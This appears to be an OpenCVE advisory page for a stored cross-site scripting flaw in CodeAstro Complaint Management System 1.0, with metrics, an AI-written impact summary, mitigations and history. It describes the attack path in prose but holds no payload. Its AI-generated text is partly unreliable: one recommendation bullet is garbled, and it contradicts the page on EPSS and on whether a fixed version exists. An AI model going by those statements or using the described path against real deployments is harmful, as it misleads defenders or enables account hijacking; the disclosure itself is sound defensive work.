Description
A security flaw has been discovered in CodeAstro Complaint Management System 1.0. This issue affects some unknown processing of the file /report/addreport of the component Report Handler. Performing a manipulation of the argument Report Title results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.
Published: 2026-06-29
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is a stored cross‑site scripting flaw in the Report Handler of CodeAstro Complaint Management System 1.0, where an attacker can inject arbitrary JavaScript into the Report Title field. This allows remote execution of scripts in the context of the administrator’s browser, potentially leading to session hijacking, defacement, or data theft. The weakness is a classic input validation failure (CWE‑79) and may also involve unsafe code execution (CWE‑94).

Affected Systems

The affected product is CodeAstro Complaint Management System, version 1.0. No other versions are explicitly listed, so the impact is confined to deployments running this specific version.

Risk and Exploitability

The CVSS score of 5.1 indicates a medium severity. The EPSS score is not available, and the vulnerability is not listed in the CISA KEV catalog, but an exploit has been publicly released and can be executed remotely by submitting a crafted Report Title to the /report/addreport endpoint. The attack path is straightforward: an attacker crafts malicious script, submits it via the vulnerable form, and the injected code is rendered when an administrator views the report.

Generated by OpenCVE AI on June 29, 2026 at 14:06 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade to the latest version of CodeAstro Complaint Management System that contains the XImplement robust server‑side validation and HTML‑escaping for the Report Title input before storing or rendering it in the admin panel.
  • Enforce a Content Security Policy that blocks inline scripts and restricts script execution to trusted sources.
  • Deploy a Web Application Firewall rule to block requests containing suspicious script payloads in the Report Title field.

Generated by OpenCVE AI on June 29, 2026 at 14:06 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 29 Jun 2026 14:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 29 Jun 2026 12:00:00 +0000

Type Values Removed Values Added
Description A security flaw has been discovered in CodeAstro Complaint Management System 1.0. This issue affects some unknown processing of the file /report/addreport of the component Report Handler. Performing a manipulation of the argument Report Title results in cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks.
Title CodeAstro Complaint Management System Report addreport cross site scripting
First Time appeared Codeastro
Codeastro complaint Management System
Weaknesses CWE-79
CWE-94
CPEs cpe:2.3:a:codeastro:complaint_management_system:*:*:*:*:*:*:*:*
Vendors & Products Codeastro
Codeastro complaint Management System
References
Metrics cvssV2_0

{'score': 4, 'vector': 'AV:N/AC:L/Au:S/C:N/I:P/A:N/E:POC/RL:ND/RC:UR'}

cvssV3_0

{'score': 3.5, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV3_1

{'score': 3.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N/E:P/RL:X/RC:R'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P'}


Subscriptions

Codeastro Complaint Management System
cve-icon MITRE

Status: PUBLISHED

Assigner: VulDB

Published:

Updated: 2026-06-29T13:27:58.208Z

Reserved: 2026-06-28T16:04:57.032Z

Link: CVE-2026-13558

cve-icon Vulnrichment

Updated: 2026-06-29T13:27:51.723Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-29T18:30:06Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

  • CWE-94

    Improper Control of Generation of Code ('Code Injection')